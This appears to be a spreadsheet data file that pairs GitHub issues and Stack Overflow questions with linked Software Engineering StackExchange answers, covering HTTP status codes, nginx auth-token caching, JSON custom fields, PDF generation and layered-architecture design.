Json editor is very conveniant and easy to use
Adding/modifying data/columns is very easy and straightforward
Cons: no input validation, so one can leave something empty, or add a
string instead of number value.
Variante:
Each template has an option to "read the json on load". When an experiment is created with this special json (maybe it can just be a special filename), there is an autogenerated custom field that appears on the page.
Let's say the json contains:
{
  "customFields": [
    {
      "name": "Pressure",
      "required": true,
      "type": "number",
      "value": 42
    },
    {
      "name": "Finish date",
      "required": false,
      "value": null,
      "type": "datetime"
    }
  ],
  "somethingelse": "goeshere",
  "othermetadata": 1337
}
Then upon item edition load, it is read, and the custom fields are displayed to the user (with some javascript trickery). The value entered are loaded directly in the json again. But maybe just using the already good json editor that we have will be enough. IDK.
Being machine readable
Another point is to be able to do machine work on this data, so using a JSON file is really good for that.</t>
  </si>
  <si>
    <t>You could go a little mongo-ish, and store custom fields as JSON in a text field. Later versions of MySQL and Postgres can even query on these.
This also means those fields are only on the rows that need them, rather than having lots of actual db fields full of null.
You may need some sort of data dictionary - perhaps in a table, so you know what to do with each custom field.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So in my project i when i am submitting a form i get the html to a action class and then clean it up as per my requirement and load the view form page in the backend for wkhtmltopdf to be able to convert that page into a pdf the issue i am facing is that this image is the view fomr page and the checkboxes or some other basic styling is different here &lt;a href="https://i.sstatic.net/pzvgv3fg.png" rel="nofollow noreferrer"&gt;expected output&lt;/a&gt; where as &lt;a href="https://i.sstatic.net/pBzHZpnf.png" rel="nofollow noreferrer"&gt;actual output&lt;/a&gt;this image here you see the differences in the pdf being generated&lt;/p&gt;
&lt;p&gt;command used for the conversion is -&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ProcessBuilder pb = new ProcessBuilder(
                &amp;quot;wkhtmltopdf&amp;quot;,
                &amp;quot;--enable-local-file-access&amp;quot;,
                &amp;quot;--disable-javascript&amp;quot;, 
                &amp;quot;--cookie&amp;quot;, &amp;quot;JSESSIONID&amp;quot;, sessionId,  // Dynamically set session ID
                &amp;quot;--javascript-delay&amp;quot;, &amp;quot;5000&amp;quot;,
                &amp;quot;--page-size&amp;quot;, &amp;quot;A4&amp;quot;,
                &amp;quot;--zoom&amp;quot;, &amp;quot;1.3&amp;quot;,
                &amp;quot;--run-script&amp;quot;, &amp;quot;document.getElementById('BottomButtons').style.display='none';&amp;quot;,  // Hide buttons before rendering
                eformHtmlUrl, pdfFilePath
            );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;if anyone could help me out with this it would mean alot&lt;/p&gt;
&lt;p&gt;i tried wkhtmltoimage and chrome headless but didn't work maybe i didn't know exactly how to implement these&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C888</t>
  </si>
  <si>
    <t>For all cases where errors displayed by the browser should be looked up in a localization bundle and the parameters replaced. The error should indicate the system and user action to take as well as what has happened. The error should be understandable by the UI user.
I am thinking there are a number of cases:
The browser issues a call, and the javascript realises that the content is not valid, in this case no rest call is issued and the client needs to display an error message.
The browser issues a rest call and it fails prior to getting to the server code, in this case the client needs to display an error message
The browser issues a rest call and the UI server validation spots that there is something wrong with the request. In this case the UI server needs to pass back the error to the client.
The UI server issues the rest call to the back end server; this could be to an OMAS endpoint or a governance server (for open lineage). The rest call fails before it gets to the backend server.
The UI server issues the rest call to the back end server; this could be to an OMAS endpoint or a governance server (for open lineage). The rest call fails and the back end server returns a response indicating the nature of the error. In this case the error needs to be mapped by the UI server into something meaningful for the browser user.
5a)This means that the error in the response needs to contain structured fields indicating the context of the error that has occurred,. For example for an invalid parameter error to an omas, then the field in the request that is invalid needs to be returned. For an invalid non null npa userid, then the UI audit log this error, as this means that the configuration is incorrect. The browser should be sent an error without the failing NPA userid value. In this case the unauthorised status code should not be returned [https://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.2.1] - as it would indicate that the client's userid is not authorised.
5b) It seems to me that http status codes from the rest calls made to the backend need to be mapped to https status codes in the response back to the browser. See
https://softwareengineering.stackexchange.com/questions/329229/should-i-return-an-http-400-bad-request-status-if-a-parameter-is-syntactically. There is some debate, but it seems that an OK response could be returned with the body describing the actual error. In this case the javascript needs to check the response to see if it is an error orientated payload or the actual payload, the OMAS response objects contain the error details. It makes sense to me to populate the response object with the error code id and parameters to the javascript can then display it in a user centric manner.
The javascript in the UI uses a Polymer component to issue the rest calls. We have logic in a component called token-ajax.js. I am suggesting that an OK (200) would contain the error code, the error would then be process by the caller. If all these responses to the view services had the same format, then maybe we should notice the error and display it in a user centric translated error log. The calling component still needs to be made aware of the error, so it can decorate its components appropriately. There are cases where the rest call fails with a non 200 return code, for example if the logged in userid is not authorised</t>
  </si>
  <si>
    <t>This is a great question, and still highly relevant given the historical context (and seemingly contradictory definitions) of the HTTP return codes.  Even among the answers to this question there are conflicting definitions.  This can be clarified by moving chronologically.
RFC 2616
(June 1999)
10.4.1 400 Bad Request
The request could not be understood by the server due to malformed
syntax. The client SHOULD NOT repeat the request without
modifications.
As of this RFC, this status code specifically applied only to syntactically invalid requests.  There was a gap in the status codes for semantic validation.  Thus, when RFC 4918 came around, a new code was born.
RFC 4918
(June 2007)
11.2.  422 Unprocessable Entity
The 422 (Unprocessable Entity) status code means the server
understands the content type of the request entity (hence a
415(Unsupported Media Type) status code is inappropriate), and the
syntax of the request entity is correct (thus a 400 (Bad Request)
status code is inappropriate) but was unable to process the contained
instructions.  For example, this error condition may occur if an XML
request body contains well-formed (i.e., syntactically correct), but
semantically erroneous, XML instructions.
422 Unprocessable Entity was created to fill the gap of semantic validation in the original specification of the 4xx status codes.  However,
another relevant RFC came about in 2014 which generalized 400 to no longer be specific to syntax
.
RFC 7231
(June 2014, explicitly obsoletes RFC 2616)
6.5.1.  400 Bad Request
The 400 (Bad Request) status code indicates that the server cannot or
will not process the request due to something that is perceived to be
a client error (e.g., malformed request syntax, invalid request
message framing, or deceptive request routing).
Note that the 422 description says that the reason 400 is inappropriate is because 400 (as of RFC 2616) should be returned only for bad request syntax.  However,
as of RFC 7231, the strict syntax-error definition no longer applies to 400
.
Back to the question at hand:  While 422 is technically more specific, given this context, I could see either 400 or 422 being used for semantic validation of API parameters.  I'm hesitant to use 422 in my own APIs because the definition of 422 is technically outdated at this point (although I don't know if that's officially recognized anywhere).  The article referenced in Fran's answer that encourages the use of 422 was written in 2012, two years before RFC 7231 clarified HTTP 400.  Just be sure to standardize on one or the other.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently having a discussion if dataset should go in the data or business layer?
My friend thinks all ADO.NET components should go in data layer.  For me this does not seem right for the following reasons:
If you create a fat Data Layer Client, it will be much more difficult to for example migrate everything to a different data source.
You can't have bound controls unless you skip the business layer logic.
I think that datasets and datatables should be in the business logic since they are generic to all data providers. The data layer should have a Provider Factory for instantiating the right provider's objects (Connection, DataAdapters, Transactions, DataReaders, etc.). For me this is the way to go for the following reasons:
Migrating to a different data layer is as easy as it gets.
You can bind your controls to rich business objects
Can some n-tier guru help us clear out which way to go?
</t>
  </si>
  <si>
    <t>C889</t>
  </si>
  <si>
    <t>That looks fine, though my comment about GET only was more with reference to binderhub and/or the redirector.
See https://softwareengineering.stackexchange.com/a/99966 for more background.
I just tried it, and it worked! I'm not sure exactly what you all did but your black magic seems to have been effective. 
Picking this up again. @bitnik can you configure a virtual host (I think this is what nginx calls it?) so that gesis.mybinder.org gets sent to https://notebooks.gesis.org/binder/ without the need of a subpath (the /binder/ part)?
I'll try and illustrate this with a (pseudo) nginx.conf (because I don't know much about it :) ):
server {
    listen 443;
    ssl on;
    # I think this is how nginx knows that this config only applies to requests
    # a Host header of gesis.mybinder.org
    server_name gesis.mybinder.org;
    # something like this for letsencrypt??
    ssl_certificate /etc/letsencrypt/live/gesis.mybinder.org/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/gesis.mybinder.org/privkey.pem;
    include snippets/ssl.conf;
    # just like the default gesis config
    location / {
        proxy_buffering off;
        proxy_pass http://bhub;
        include snippets/headers.conf;
        proxy_set_header X-Scheme $scheme;
    }
Not sure if we really need this to move forward and if we can have this in parallel with your existing setup. I think both JupyterHub and BinderHub are configured with a sub path :-/</t>
  </si>
  <si>
    <t>In HTTP 1.1, there **actually is a status code** ([307][1]) which indicates that the request should be repeated using **the same method and post data**. 
As others have said, there is a **potential for misuse** here which may be why many frameworks stick to 301 and 302 in their abstractions. However, with **proper understanding and responsible usage,** you should be able to accomplish what you're looking for. 
Note that according to the [W3.org spec][2], when the `METHOD` is not `HEAD` or `GET`, **user agents should prompt the user** before re-executing the request at the new location. You should also **provide a note and a fallback mechanism** for the user in case old user agents aren't sure what to do with a 307. 
Using this form:
&lt;!-- language: html --&gt;
    &lt;form action="Test307.aspx" method="post"&gt;
        &lt;input type="hidden" name="test" value="the test" /&gt;
        &lt;input type="submit" value="test" /&gt;    
    &lt;/form&gt;
And having Test307.aspx simply return 307 with the Location:http://google.com, Chrome 13 and Fiddler confirm that "test=the test" is indeed posted to Google. Of course the further response is a 405 since Google doesn't allow the POST, but it shows the mechanics.
For more information see [List of HTTP status codes][3] and the [W3.org spec][2].
&gt; 307 Temporary Redirect (since HTTP/1.1) In this occasion, the request
&gt; should be repeated with another URI, but future requests can still use
&gt; the original URI.[2] In contrast to 303, the request method should not
&gt; be changed when reissuing the original request. For instance, a POST
&gt; request must be repeated using another POST request.
  [1]: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307
  [2]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  [3]: http://en.wikipedia.org/wiki/List_of_HTTP_status_codes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to convert a DWG file to a PDF using win32com.client in Python, while applying a custom scale of 0.2 . However, the resulting PDF does not have the expected scale.&lt;/p&gt;
&lt;p&gt;Here is the code I'm using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import win32com.client
import time
import os
def dwg_to_pdf_win32(dwg_file_path, pdf_file_path):
    try:
        # Initialize AutoCAD
        autocad = win32com.client.Dispatch(&amp;quot;AutoCAD.Application&amp;quot;)
        autocad.Visible = False
        # Open the DWG file
        doc = autocad.Documents.Open(dwg_file_path)
        layout = doc.Layouts.Item(&amp;quot;Model&amp;quot;)
        layout.PlotType = 2  # Extents
        layout.CenterPlot = True
        layout.PlotRotation = 1
        layout.ConfigName = &amp;quot;Microsoft Print to PDF&amp;quot;
        layout.CanonicalMediaName = &amp;quot;A3&amp;quot;
        layout.UseStandardScale = False
        layout.PaperUnits = 1
        layout.SetCustomScale(1, 0.2)  # Scale: 1/200
        layout.PlotWithLineweights = False
        layout.PlotWithPlotStyles = True
        layout.StyleSheet = &amp;quot;style.ctb&amp;quot;
        # Create the PDF
        plot = doc.Plot
        plot.PlotToFile(pdf_file_path)
        # Wait for the PDF to be created
        timeout = 120
        for _ in range(timeout):
            if os.path.exists(pdf_file_path):
                print(f&amp;quot;PDF generated: {pdf_file_path}&amp;quot;)
                break
            time.sleep(1)
        else:
            print(&amp;quot;PDF file was not created.&amp;quot;)
            return None
        # Close document
        doc.Close(False)
        print(&amp;quot;Conversion successful!&amp;quot;)
    except Exception as e:
        print(f&amp;quot;Error during conversion: {e}&amp;quot;)
# Example usage
dwg_to_pdf_win32(
    &amp;quot;C:\\Users\\hp\\P8818-PLAN.dwg&amp;quot;,
    &amp;quot;C:\\Users\\hp\\P8818-PLAN.pdf&amp;quot;
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any insights or corrections would be greatly appreciated. Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C89</t>
  </si>
  <si>
    <t>SignupForm inherits from UserCreationForm
The passwords weren't being validated the first time around because
our Form wasn't validating the values against the validators,
just making sure they matched.
Inheriting from the UserCreation form means we have consistent user
creation happening between the signup form, the admin page, and the
password reset form.
Sources:
- https://stackoverflow.com/questions/51905804/using-a-custom-user-the-password-validation-from-settings-are-ignored-on-registr</t>
  </si>
  <si>
    <t>The password is not validated because you are not calling any validator in your UserBaseCreationForm. You can do this in different ways and the easiest one would be just inheriting UserCreationForm from django.contrib.auth.forms.
Check the django source code, it calls the password validators in _post_clean.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to write an &lt;code&gt;async&lt;/code&gt; function &lt;code&gt;recv_some&lt;/code&gt; which takes a &lt;code&gt;watch::Receiver&amp;lt;Option&amp;lt;T&amp;gt;&amp;gt;&lt;/code&gt;, waits for the value to be &lt;code&gt;Some&lt;/code&gt;, and returns something which &lt;code&gt;Deref&lt;/code&gt;'s to &lt;code&gt;T&lt;/code&gt;. For reasons I sort of understand, when I do this the obvious way, the borrow checker complains. I can't seem to work around the issue either.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;use std::ops::Deref;
use tokio::sync::watch;
pub struct WatchSomeRef&amp;lt;'a, T&amp;gt;(watch::Ref&amp;lt;'a, Option&amp;lt;T&amp;gt;&amp;gt;);
impl&amp;lt;T&amp;gt; Deref for WatchSomeRef&amp;lt;'_, T&amp;gt; {
    type Target = T;
    fn deref(&amp;amp;self) -&amp;gt; &amp;amp;Self::Target {
        self.0.as_ref().unwrap()
    }
}
pub async fn recv_some&amp;lt;T&amp;gt;(
    rx: &amp;amp;mut watch::Receiver&amp;lt;Option&amp;lt;T&amp;gt;&amp;gt;,
) -&amp;gt; Result&amp;lt;WatchSomeRef&amp;lt;T&amp;gt;, watch::error::RecvError&amp;gt; {
    loop {
        {
            let guard = rx.borrow_and_update();
            if guard.is_some() {
                return Ok(WatchSomeRef(guard));
            }
        }
        rx.changed().await?;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I do this, I get the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error[E0499]: cannot borrow `*rx` as mutable more than once at a time
  --&amp;gt; src/lib.rs:20:25
   |
16 |     rx: &amp;amp;mut watch::Receiver&amp;lt;Option&amp;lt;T&amp;gt;&amp;gt;,
   |         - let's call the lifetime of this reference `'1`
...
20 |             let guard = rx.borrow_and_update();
   |                         ^^ `*rx` was mutably borrowed here in the previous iteration of the loop
21 |             if guard.is_some() {
22 |                 return Ok(WatchSomeRef(guard));
   |                        ----------------------- returning this value requires that `*rx` is borrowed for `'1`
error[E0499]: cannot borrow `*rx` as mutable more than once at a time
  --&amp;gt; src/lib.rs:25:9
   |
16 |     rx: &amp;amp;mut watch::Receiver&amp;lt;Option&amp;lt;T&amp;gt;&amp;gt;,
   |         - let's call the lifetime of this reference `'1`
...
20 |             let guard = rx.borrow_and_update();
   |                         -- first mutable borrow occurs here
21 |             if guard.is_some() {
22 |                 return Ok(WatchSomeRef(guard));
   |                        ----------------------- returning this value requires that `*rx` is borrowed for `'1`
...
25 |         rx.changed().await?;
   |         ^^ second mutable borrow occurs here
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ETA:&lt;/p&gt;
&lt;p&gt;I think this happens because which lifetime we want on the guard depends on the underlying value. If it's &lt;code&gt;Some&lt;/code&gt;, it needs to outlast the function call, but if it's &lt;code&gt;None&lt;/code&gt; it needs to be dropped right away so we can wait for the next change.&lt;/p&gt;
&lt;p&gt;I still have no idea how to work around it though (except using an unsafe mem::transmute to change the lifetime).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C890</t>
  </si>
  <si>
    <t>external auth provider results in a *lot* of external auth requests
Hey,
Just looking for a bit of advice really. We're using the external auth provider to protect a few sites via oauth-proxy at the moment.
What we've realised however is that you very, very quickly end up DOSing your oauth-proxy. Lets say that your site page has 30-40 resources it loads (css, js and so on), each of these will generate an /auth check to your external auth provider.
In an ideal world, we could do with being able to some how configure nginx to do very short term caching of auth requests, like, 5 seconds, and this would decrease upstream load on the oauth proxy by circa 95%.
Any thoughts?
https://softwareengineering.stackexchange.com/questions/299535/caching-authenticated-requests-for-all-users makes for interesting reading. To make this work i'd need to be able to configure nginx to cache /auth requests on the content of the cookie that oauth-proxy upstream sets.</t>
  </si>
  <si>
    <t>I've been trying to address a similar issue. 
My users need to be authenticated for every request they make.
I've been focusing on getting the users authenticated at least once by the backend app (validation of the JWT token), but after that, I decided I shouldn't need the backend anymore.
I chose to avoid requiring any Nginx plugin that is not included by default. Otherwise you can check nginx-jwt or Lua scripting and these would probably be great solutions.
Addressing authentication
So far I've done the following:
Delegated the authentication to Nginx using
auth_request
. This calls an
internal
location that passes the request to my backend token validation endpoint. This alone doesn't address the issue of handling a high number of validations at all.
The result of the token validation is cached using a
proxy_cache_key "$cookie_token";
directive. Upon successful token validation, the backend adds a
Cache-Control
directive that tells Nginx to only cache the token for up to 5 minutes.
At this point, any auth token validated once is in the cache, subsequent requests from the same user/token don't touch the auth backend anymore!
To protect my backend app against potential flooding by invalid tokens, I also cache refused validations, when my backend endpoint returns 401. These ones are only cached for a short duration to avoid potentially filling the Nginx cache with such requests.
I've added a couple of additional improvements such as a logout endpoint that invalidates a token by returning 401 (which is also cached by Nginx) so that if the user clicks logout, the token cannot be used anymore even if it's not expired.
Also, my Nginx cache contains for every token, the associated user as a JSON object, which saves me from fetching it from the DB if I need this information ; and also saves me from decrypting the token.
About token lifetime and refresh tokens
After 5 minutes, the token will have expired in the cache, so the backend will be queried again. This is to ensure that you're able to invalidate a token, because the user logs out, because it has been compromised, and so on. Such periodic revalidation, with proper implementation in the backend, avoids me to have to use refresh tokens.
Traditionally refresh tokens would be used to request a new access token; they would be stored in your backend and you would verify that a request for an access token is made with a refresh token that matches the one you have in the database for this specific user. If the user logs out, or tokens are compromised you would delete/invalidate the refresh token in your DB so that the next request for a new token using the invalidated refresh token would fail.
In short, refresh tokens usually have a long validity and are always checked against the backend. 
They are used to generate access tokens that have a very short validity (a few minutes). These access tokens normally do reach your backend but you only check their signature and expiration date.
Here in my setup, we are using tokens with a longer validity (can be hours or a day), that have the same role and features as both an access token and a refresh token. Because we have their validation and invalidation cached by Nginx, they are only fully verified by the backend once every 5 minutes. So we keep the benefit of using refresh tokens (be able to quickly invalidate a token) without the added complexity. And simple validation never ever reaches your backend that is at least 1 order of magnitude slower than the Nginx cache, even if used only for signature and expiry date checking.
With this setup, I could disable authentication in my backend, since all  incoming requests reach the
auth_request
Nginx directive before touching it.
That doesn't fully solve the problem if you need to perform any kind per-resource authorization, but at least you've saved the basic authorization part. And you can even avoid decrypting the token or do a DB lookup to access token data since Nginx cached auth response can contain data and pass it back to the backend.
Now, my biggest concern is that I may be breaking something obvious related to security without realizing it.
That being said, any received token is still validated at least once before being cached by Nginx. Any tempered token would be different so wouldn't hit the cache since the cache key would also be different.
Also, maybe it's worth mentioning that a real world authentication would fight against token stealing by generating (and verifying) an additional Nonce or something.
Here is a simplified extract of my Nginx config for my app:
# Cache for internal auth checks
proxy_cache_path /usr/local/var/nginx/cache/auth levels=1:2 keys_zone=auth_cache:10m max_size=128m inactive=10m use_temp_path=off;
# Cache for content
proxy_cache_path /usr/local/var/nginx/cache/resx levels=1:2 keys_zone=content_cache:16m max_size=128m inactive=5m use_temp_path=off;
server {
    listen 443 ssl http2;
    server_name ........;
    include /usr/local/etc/nginx/include-auth-internal.conf;
    location /api/v1 {
        # Auth magic happens here
        auth_request         /auth;
        auth_request_set     $user $upstream_http_X_User_Id;
        auth_request_set     $customer $upstream_http_X_Customer_Id;
        auth_request_set     $permissions $upstream_http_X_Permissions;
        # The backend app, once Nginx has performed internal auth.
        proxy_pass           http://127.0.0.1:5000;
        proxy_set_header     X-User-Id $user;
        proxy_set_header     X-Customer-Id $customer;
        proxy_set_header     X-Permissions $permissions;
        # Cache content
        proxy_cache          content_cache;
        proxy_cache_key      "$request_method-$request_uri";
    }
    location /api/v1/Logout {
        auth_request         /auth/logout;
    }
}
Now, here's the configuration extract for the internal
/auth
endpoint, included above as
/usr/local/etc/nginx/include-auth-internal.conf
:
# Called before every request to backend
location = /auth {
    internal;
    proxy_cache             auth_cache;
    proxy_cache_methods     GET HEAD POST;
    proxy_cache_key         "$cookie_token";
    # Valid tokens cache duration is set by backend returning a properly set Cache-Control header
    # Invalid tokens are shortly cached to protect backend but not flood Nginx cache
    proxy_cache_valid       401 30s;
    # Valid tokens are cached for 5 minutes so we can get the backend to re-validate them from time to time
    proxy_cache_valid       200 5m;
    proxy_pass              http://127.0.0.1:1234/auth/_Internal;
    proxy_set_header        Host ........;
    proxy_pass_request_body off;
    proxy_set_header        Content-Length "";
    proxy_set_header        Accept application/json;
}
# To invalidate a not expired token, use a specific backend endpoint.
# Then we cache the token invalid/401 response itself.
location = /auth/logout {
    internal;
    proxy_cache             auth_cache;
    proxy_cache_key         "$cookie_token";
    # Proper caching duration (&gt; token expire date) set by backend, which will override below default duration
    proxy_cache_valid       401 30m;
    # A Logout requests forces a cache refresh in order to store a 401 where there was previously a valid authorization
    proxy_cache_bypass      1;
    # This backend endpoint always returns 401, with a cache header set to the expire date of the token
    proxy_pass              http://127.0.0.1:1234/auth/_Internal/Logout;
    proxy_set_header        Host ........;
    proxy_pass_request_body off;
}
.
Addressing content serving
Now the authentication is separated from the data. Since you told it was identical for every user, the content itself can also be cached by Nginx (in my example, in the
content_cache
zone).
Scalability
This scenario works great out of the box assuming that you have one Nginx server. In a real world scenario you probably have high availability, meaning multiple Nginx instances, potentially also hosting your (Laravel) backend application. In that case, any request your users make could be sent to any of your Nginx servers, and until they all have locally cached the token, they will keep reaching your backend to verify it. For a small number of servers, using this solution would still bring big benefits.
However, it is important to note that with multiple Nginx servers (and thus caches) you lose the ability to log out on the server side because you're unable to purge (by forcing a refresh) the tokens cache on all of them, like
/auth/logout
does in my example. You're only left with the 5mn token cache duration that will force your backend to be queried soon, and will tell Nginx that the request is denied. A partial workaround is to delete the token header or cookie on the client when logging out.
Any comment would be very welcomed and appreciated!</t>
  </si>
  <si>
    <t xml:space="preserve">I often hear things like "Can we load our employee info using LDAP?"  Yet, the title "Lightweight Directory Access Protocol" makes me think of it as a protocol rather than a physical database management system like Oracle or MSSQL.
So could someone please explain to me what LDAP is, how it's used, and how it basically works?  Is LDAP simply a standard protocol for extracting data from a variety of DBMSs?  In an architecture diagram, would LDAP be simply an arrow drawn between the DB and the application server?
</t>
  </si>
  <si>
    <t>C891</t>
  </si>
  <si>
    <t>If JSON parsing fails, we should return 400, I believe. This post ( https://softwareengineering.stackexchange.com/questions/329229/should-i-return-an-http-400-bad-request-status-if-a-parameter-is-syntactically ) seems to confirm that 400 is the right code.
I think there are two separate questions at work here:
(1) should we return 400 in the specific case where someone posts a JSON object for an assignment and the JSON is not parseable? probably yes.
(2) should we modify the main catch-all error handling middleware to return 404(resource not found - or something else) instead of 500 (internal server error)? maybe (see my point about clients looking for 500 explicitly or looking for &gt;200 status codes to determine errors).
At the moment, Java and Python versions post JSON strings whereas C++ seems to post JSON objects. Multiple stages of the assignment upload process can fail, so we have a generic catch-all error handling middleware to avoid having a bunch of different hard-coded errors thrown. This currently throws 500. I can override any particular error with something more explicit wherever that's useful.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to write this but it doesn't work.
In my case I need &lt;strong&gt;IS NULL&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UPDATE CTRY1 ctrySts
SET startDate =
 (SELECT
    MIN(CTRY.VALIDATIONDate) 
FROM
    COUNTRY CTRY
JOIN
    LANGUAGE_DETAIL LNGE
        ON CTRY.DETAIL_FK = LNGE.DETAIL_PK 
WHERE
    CTRY.CODE = 'WDIZ' 
    AND CTRY.INDICATORCODE = (CASE
                                     WHEN CTRY1.INDICATORCODE IS NOT NULL THEN CTRY1.INDICATORCODE
                                     **ELSE IS NULL** 
                                     END)
                                     )
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C892</t>
  </si>
  <si>
    <t>Backend: Kafka Push Notifications
 Implement an endpoint in the python server. This endpoint should take the message received by the Kafka consumer as the JSON body and return a list of device_tokens .
 Need to implement a filter at the db level.. Something like (https://softwareengineering.stackexchange.com/questions/341766/database-design-for-storing-user-groups-based-on-filter-criteria)</t>
  </si>
  <si>
    <t>The filters are really predicates in your SQL statement. (WHERE clause)
A predicate consists of:
Column Name, Operator, and Value
Additionally there could be multiple predicates with AND/OR combinations.
So, start with a table of Name, Operator, and Value.  Also a table of how predicates are combined.
Then code to read tables and build up the WHERE clause appropriately.
**Filter Table**
ID, Description
1, 10 Purchases with a total amount over 100 dollars
**Predicate Table**
ID, Filter ID, Name, Operator, Value
1,1,PurchaseCount,GreaterThanEqual,10
2,1,PurchaseAmount,GreaterThan,100
**PredicateCombination Table**
ID, Filter ID, LeftPredId, RightPredId, Condition
1, 1, 1, 2, AND</t>
  </si>
  <si>
    <t xml:space="preserve">For a couple of years, I've been using the three-tier architecture (Presentation, Logic and Data Layer) to write applications. Usually, I am using tools such as .netTiers to generate the data layer and partially the logic layer. Everything is well defined and I love it. 
I am now constraint to use LINQ to Entites (it appears that LINQ to SQL was abandoned by Microsoft) and I am really confused. It looks to me like the code generated by LINQ to Entites is a big mix of the logic and data layer on which I have very little control. In addition, I don't really like the fact that I have to use the classes (entities...) generated. 
In the end, could you share your experiences and best practices with LINQ to Entities? Any idea how I could still have a well defined Three-Tier architecture?
Thanks!
</t>
  </si>
  <si>
    <t>C893</t>
  </si>
  <si>
    <t>RFC: Use Model folder for Business layer
I think it is highly arguable. The term "service" is overloaded and means different things in different architectures.
Service is not a canonical or generic software term. In fact, the suffix Service on a class name is a lot like the much-maligned Manager: It tells you almost nothing about what the object actually does.
https://softwareengineering.stackexchange.com/questions/218011/how-accurate-is-business-logic-should-be-in-a-service-not-in-a-model/218394#218394
Suggestions derived from the discussion
Let's directly use the /src/Model folder
// base class
src/Model/Model.php
// concrete business class
src/Model/CalculationModel.php
// load via factory (or also via trait)
$calculationModel = ModelRegistry::get('Calculation')
The model could have the Table loading trait then to make $this-&gt;loadModel() Table calls internally.
Even though I don't like the word model here too much in that method. Also problematic: Nesting then, as the sub-namespaces Table, Entity, Behavior etc are collisions.
We could also use a completely free namespace, of course.
Any other BC ideas that would be minimal invasive but allows to do separation as opt-in?
We could get this started in 3.6 even then</t>
  </si>
  <si>
    <t>In order to define what a *service's* responsibilities are, you first need to define what a *service* is.
*Service* is not a canonical or generic software term. In fact, the suffix `Service` on a class name is a lot like the much-maligned [Manager][1]: It tells you almost nothing about what the object actually *does*.
In reality, what a service ought to do is highly architecture-specific:
  1. In a traditional layered architecture, *service* is literally synonymous with *business logic layer*. It's the layer between UI and Data. Therefore, **all** business rules go into services. The data layer should only understand basic CRUD operations, and the UI layer should deal only with the mapping of presentation DTOs to and from the business objects.
  2. In an RPC-style distributed architecture (SOAP, UDDI, BPEL, etc.), the *service* is the logical version of a physical *endpoint*. It is essentially a collection of operations that the maintainer wishes to provide as a public API. Various best practices guides explain that a service *operation* should in fact be a business-level operation and not CRUD, and I tend to agree.
     However, because routing *everything* through an actual remote service can seriously hurt performance, it's normally best *not* to have these services actually implement the business logic themselves; instead, they should wrap an "internal" set of business objects. A single service might involve one or several business objects.
  3. In an MVP/MVC/MVVM/MV* architecture, *services* don't exist at all. Or if they do, the term is used to refer to any generic object that can be injected into a controller or view model. The business logic is in your *model*. If you want to create "service objects" to orchestrate complicated operations, that's seen as an implementation detail. A lot of people, sadly, implement MVC like this, but it's considered an anti-pattern ([Anemic Domain Model][2]) because the model itself does nothing, it's just a bunch of properties for the UI.
     Some people mistakenly think that taking a 100-line controller method and shoving it all into a service somehow makes for a better architecture. It really doesn't; all it does is add another, probably unnecessary layer of indirection. *Practically* speaking, the controller is still doing the work, it's just doing so through a poorly named "helper" object. I highly recommend Jimmy Bogard's [Wicked Domain Models][3] presentation for a clear example of how to turn an anemic domain model into a useful one. It involves careful examination of the models you're exposing and which operations are actually valid in a *business* context.
     For example, if your database contains Orders, and you have a column for Total Amount, your application *probably* shouldn't be allowed to actually change that field to an arbitrary value, because (a) it's history and (b) it's supposed to be determined by what's *in* the order as well as perhaps some other time-sensitive data/rules. Creating a service to manage Orders does not necessarily solve this problem, because user code can *still* grab the actual Order object and change the amount on it. Instead, the order *itself* should be responsible for ensuring that it can only be altered in safe and consistent ways.
  4. In DDD, services are meant specifically for the situation [when you have an operation that doesn't properly belong to any aggregate root][5]. You have to be careful here, because often the need for a service can imply that you didn't use the correct roots. But assuming you did, a service is used to coordinate operations across multiple roots, or sometimes to handle concerns that don't involve the domain model at all (such as, perhaps, writing information to a BI/OLAP database).
     One notable aspect of the DDD service is that it is allowed to use [transaction scripts][6]. When working on large applications, you're very likely to eventually run into instances where it's just way easier to accomplish something with a T-SQL or PL/SQL procedure than it is to fuss with the domain model. This is OK, and it belongs in a Service.
    This is a radical departure from the layered-architecture definition of services. A service layer encapsulates domain objects; a DDD service encapsulates whatever **isn't** in the domain objects and doesn't make sense to be.
  5. In a Service-Oriented Architecture, a *service* is considered to be the technical authority for a business capability. That means that it is the *exclusive* owner of a certain subset of the business data and nothing else is allowed to touch that data - not even to just *read* it.
     By necessity, services are actually an end-to-end proposition in an SOA. Meaning, a service isn't so much a specific *component* as an entire *stack*, and your entire application (or your entire business) is a set of these services running side-by-side with no intersection except at the messaging and UI layers. Each service has its own data, its own business rules, and its own UI. They don't need to orchestrate with each other because they are supposed to be business-aligned - and, like the business itself, each service has its own set of responsibilities and operates more or less independently of the others.
     So, by the SOA definition, every piece of business logic *anywhere* is contained within the service, but then again, so is the entire *system*. Services in an SOA can have *components*, and they can have *endpoints*, but it's fairly dangerous to call any piece of code a *service* because it conflicts with what the original "S" is supposed to mean.
     Since SOA is generally pretty keen on messaging, the operations that you might have packaged in a *service* before are generally encapsulated in *handlers*, but the multiplicity is different. Each handler handles *one* message type, *one* operation. It's a strict interpretation of the [Single Responsibility Principle][4], but makes for great maintainability because every possible operation is in its own class. So you don't really *need* centralized business logic, because commands represents business operations rather than technical ones.
